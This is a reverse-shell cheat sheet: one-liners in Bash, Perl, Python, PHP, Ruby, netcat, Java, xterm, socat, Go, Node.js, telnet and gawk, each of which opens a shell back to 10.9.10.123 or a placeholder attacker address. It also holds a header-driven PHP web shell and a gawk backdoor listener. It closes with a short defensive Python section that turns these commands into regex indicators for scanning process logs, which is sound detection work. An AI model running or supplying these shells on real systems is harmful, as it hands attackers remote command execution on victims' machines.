Reverse Shells
Mostly from PentestMonkey and HighOn.Coffee
Bash
Some versions of bash can send you a reverse shell:
bash -i >& /dev/tcp/10.9.10.123/1234 0>&1
exec /bin/bash 0&0 2>&0
0<&196;exec 196<>/dev/tcp/10.9.10.123/1234; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/10.9.10.123/80
cat <&5 | while read line; do $line 2>&5 >&5; done
# or:
while read line 0<&5; do $line 2>&5 >&5; done
PERL
perl -e 'use Socket;$i="10.9.10.123";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Perl Windows
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"10.9.10.123:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
perl -e 'use Socket;$i="10.9.10.123";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Python
Works with python 2 or 3; substitute ‘python3’ if necessary
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.10.123",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP
This code assumes that the TCP connection uses file descriptor 3. If it doesn’t work, try 4, 5, 6…
php -r '$sock=fsockopen("10.9.10.123",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.9.10.123/1234 0>&1'");?>
Base64-encoded variant by @0xInfection:
<?=$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0]($x[1]);
Ruby
ruby -rsocket -e'f=TCPSocket.open("10.9.10.123",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Netcat
Netcat is rarely present on production systems, and even if it is, there are several versions of netcat, some of which don’t support the -e option.
nc -e /bin/sh 10.9.10.123 1234
This one is gold:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.10.123 1234 >/tmp/f
/bin/sh | nc 10.9.10.123 80
OpenBSD netcat
mkfifo /tmp/lol;nc ATTACKER-IP PORT 0</tmp/lol | /bin/sh -i 2>&1 | tee /tmp/lol
Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.9.10.123/1234;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
xterm
One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.9.10.123) on TCP port 6001.
xterm -display 10.9.10.123:1
To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):
Xnest :1
You’ll need to authorise the target to connect to you (command also run on your host):
xhost +targetip
socat
socat tcp:ip:port exec:'bash -i',pty,stderr,setsid,sigint,sane &
Golang
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","10.9.10.123:1337");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run();}'>/tmp/sh.go&&go run /tmp/sh.go
Node.js
require('child_process').exec('bash -i >& /dev/tcp/10.9.10.123/80 0>&1');
Telnet
rm -f /tmp/p; mknod /tmp/p p && telnet 10.9.10.123 80 0</tmp/p | /bin/sh 1>/tmp/p
telnet 10.9.10.123 80 | /bin/bash | telnet 10.9.10.123 443
Remember to listen on 443 on the attacking machine also.
Gawk
gawk 'BEGIN {P=4444;S="> ";H="10.9.10.123";V="/inet/tcp/0/"H"/"P;while(1){do{printf S|&V;V|&getline c;if(c){while((c|&getline)>0)print $0|&V;close(c)}}while(c!="exit")close(V)}}'
#!/usr/bin/gawk -f
BEGIN {
    Port = 8080
    Prompt = "bkd> "
    Service = "/inet/tcp/" Port "/0/0"
    while (1) {
        do {
            printf Prompt |& Service
            Service |& getline cmd
            if (cmd) {
                while ((cmd |& getline) > 0)
                    print $0 |& Service
                close(cmd)
            }
        } while (cmd != "exit")
        close(Service)
    }
}
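As an added defender-side example (not code from PentestMonkey or HighOn.Coffee), the Python below turns the one-liners on this page into command-line heuristics and runs them over constructed process records such as an auditd or ps export would yield; the record format, the indicator names and the sample records are assumptions made for this example.

```python
import re
from typing import Dict, List

# Heuristics distilled from the one-liners on this page. They are constructed for this
# example (not a vendor ruleset) and match process command lines, e.g. from auditd or ps.
INDICATORS = {
    "bash_dev_tcp": re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"),
    "nc_exec_shell": re.compile(r"\bnc\b.*\s-e\s+/bin/(?:ba)?sh\b"),
    "fifo_piped_to_net": re.compile(r"mk(?:fifo|nod)\s+\S+.*\|\s*(?:nc|telnet)\b"),
    "python_dup2_subprocess": re.compile(r"socket\.socket\(.*dup2\(.*subprocess"),
    "perl_socket_exec": re.compile(r"use Socket;.*connect\(.*exec\("),
    "php_fsockopen_exec": re.compile(r"fsockopen\(.*exec\("),
    "ruby_tcpsocket_exec": re.compile(r"TCPSocket\.open\(.*\bexec\b"),
    "socat_exec_pty": re.compile(r"\bsocat\b.*exec:.*\bpty\b"),
    "xterm_remote_display": re.compile(r"\bxterm\b.*-display\s+\d{1,3}(?:\.\d{1,3}){3}:\d"),
    "gawk_inet_tcp": re.compile(r"/inet/tcp/"),
}

# Constructed sample records in an assumed "pid=<n> user=<u> cmd=<cmdline>" format.
SAMPLE_LOG = [
    "pid=4101 user=www-data cmd=bash -i >& /dev/tcp/10.9.10.123/1234 0>&1",
    "pid=4102 user=www-data cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.10.123 1234 >/tmp/f",
    "pid=4103 user=deploy cmd=nc -zv 10.9.10.123 443",
    "pid=4104 user=deploy cmd=python3 -c 'import socket; print(socket.gethostname())'",
    "pid=4105 user=www-data cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,"
    "socket.SOCK_STREAM);s.connect((\"10.9.10.123\",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);"
    "os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'",
    "malformed record that the parser must skip, not crash on",
]

RECORD = re.compile(r"pid=(\d+) user=(\S+) cmd=(.*)$")


def match_indicators(cmdline: str) -> List[str]:
    """Return the names of every indicator that fires on one process command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]


def scan_process_log(lines: List[str]) -> List[Dict]:
    """Parse records, keep only those with at least one indicator, preserve input order."""
    hits = []
    for line in lines:
        m = RECORD.match(line)
        if not m:
            continue  # tolerate malformed input: a logging glitch must not stop the scan
        names = match_indicators(m.group(3))
        if names:
            hits.append({"pid": int(m.group(1)), "user": m.group(2), "indicators": names})
    return hits
```

Calling scan_process_log(SAMPLE_LOG) flags pids 4101, 4102 and 4105 and leaves the two benign deploy-user records alone; real fleets need the patterns tuned against their own baseline of legitimate nc, socat and python usage.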